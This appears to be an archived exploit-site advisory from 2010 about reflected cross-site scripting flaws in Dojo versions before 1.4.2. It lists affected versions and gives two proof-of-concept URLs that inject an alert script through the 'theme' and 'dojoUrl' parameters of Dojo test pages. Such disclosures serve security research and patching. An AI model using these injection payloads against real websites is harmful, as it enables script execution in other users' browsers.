Home / os / winme

Dojo Versions Prior to 1.4.2 Multiple Cross Site Scripting V

Posted on 16 March 2010

========================================================================== Dojo Versions Prior to 1.4.2 Multiple Cross Site Scripting Vulnerabilities ========================================================================== Vulnerable: The Dojo Foundation Dojo 1.4.1 The Dojo Foundation Dojo 0.9 The Dojo Foundation Dojo 0.4.3 The Dojo Foundation Dojo 0.4.2 The Dojo Foundation Dojo 0.4.1 The Dojo Foundation Dojo 1.1 The Dojo Foundation Dojo 1.0 http://www.example.com/dijit/tests/form/test_Button.html?theme="/><script>alert(/xss/)</script> http://www.example.com/util/doh/runner.html?dojoUrl='/>foo</script><'"<script>alert(/xss/)</script> # ~ - [ [ : Inj3ct0r : ] ]

 

TOP